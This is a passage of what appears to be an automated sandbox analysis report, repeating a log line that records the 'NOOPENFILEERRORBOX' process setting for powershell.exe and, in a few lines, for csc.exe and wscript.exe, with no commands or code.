          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
